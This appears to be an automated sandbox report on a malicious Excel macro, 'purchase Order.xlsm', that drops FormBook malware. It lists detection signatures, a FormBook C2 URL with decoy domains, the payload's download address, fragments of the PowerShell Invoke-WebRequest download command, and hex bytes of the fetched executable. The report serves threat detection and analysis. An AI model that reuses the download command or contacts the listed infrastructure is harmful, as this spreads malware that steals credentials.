Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name: purchase Order.xlsm
Analysis ID: 510341
MD5: d1ad5761044b2abb12b78700f1a3a537
SHA1: 7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256: 8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags: xlsm
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects a PE file into a foreign processes
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.art-for-a-cause.com/m5cw/"], "decoy": ["stolpfabriken.com", "aromaessentialco.com", "rmcclaincpa.com", "wuruixin.com", "sidhyanticlasses.com", "horilka.store", "organic-outlaws.com", "customsoftwarelogistics.com", "cheryltesting.com", "thecompacthomegym.com", "the22yards.club", "quickloanprovidersservices.com", "grippyent.com", "guard-usa.com", "agircredit.com", "classificationmetallurgie.com", "quizzesandcode.com", "catdanos.com", "8676789.rest", "gotbestshavlngplansforyou.com", "supboarddesign.com", "byrdemailplans.xyz", "anngola.com", "milelefoods.com", "runawaypklyau.xyz", "redesignyourpain.com", "yourtv2ship.info", "jxypc.com", "lerjighjuij.store", "spiruline-shop.com", "qarziba-therapy.care", "hardayumangosteen.com", "freevolttech.com", "xiongbaosp.xyz", "balanzasdeplataforma.com", "johnathanmanney.com", "estcequecestgreen.com", "france-temps-partage.net", "fbiicrc.com", "privateairjets.com", "xn--5m4a23skoc.group", "andrewmurnane.com", "exitin90.com", "depofmvz.com", "bosphorus.website", "aragon.store", "nrnmuhendislik.com", "thesharingcorporation.com", "tccraft.online", "carjabber.com", "limitlesschurchbf.com", "dazalogistics.com", "x-play.club", "bitterbay.net", "forwardhcd.com", "smance.xyz", "netgearcloud.net", "wellaspiron.com", "heidelay.xyz", "qknzutohbtro.mobi", "epurhybrid.com", "pelitupmukaeksklusif.com", "secondave.online", "lockdownshowdown.online"]}
Multi AV Scanner detection for submitted file
Source: purchase Order.xlsm Virustotal: Detection: 22% Perma Link
Source: purchase Order.xlsm ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: purchase Order.xlsm Avira: detected
Antivirus detection for URL or domain
Source: www.art-for-a-cause.com/m5cw/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://212.192.241.75/sam/new3.exe Virustotal: Detection: 11% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll Avira: detection malicious, Label: TR/Tesla.ivvdd
Source: C:\Users\Public\eVJOpc.exe Avira: detection malicious, Label: TR/Tesla.amqdv
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\eVJOpc.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll ReversingLabs: Detection: 37%
Machine Learning detection for dropped file
Source: C:\Users\Public\eVJOpc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.2.eVJOpc.exe.f040000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.1.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.3.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 19.2.wlanext.exe.2e7de48.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.eVJOpc.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.2.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.1.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00405E93 FindFirstFileA,FindClose, 8_2_00405E93
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_004054BD
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402671 FindFirstFileA, 8_2_00402671

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
Source: excel.exe Memory has grown: Private usage: 1MB later: 68MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.art-for-a-cause.com/m5cw/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RAPMSB-ASRU RAPMSB-ASRU
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 16:19:34 GMTServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30Last-Modified: Tue, 26 Oct 2021 23:46:46 GMTETag: "41504-5cf4a171fd45b"Accept-Ranges: bytesContent-Length: 267524Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 9c f1 03 00 68 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.75
Source: PowerShell_transcript.061544.RzyXj49c.20211027181911.txt.1.dr String found in binary or memory: http://212.192.241.75/sam/new3.exe
Source: powershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmp String found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp String found in binary or memory: http://212.192.241.75/sam/new3.exenvoke-WebRequest
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.754
Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: eVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000000A.00000000.383527191.00000000089CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openxmlformatm
Source: powershell.exe, 00000001.00000002.357492979.00000000049D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.aadrm.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.office.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.onedrive.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.entity.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cortana.ai/api
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cr.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://directory.services.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
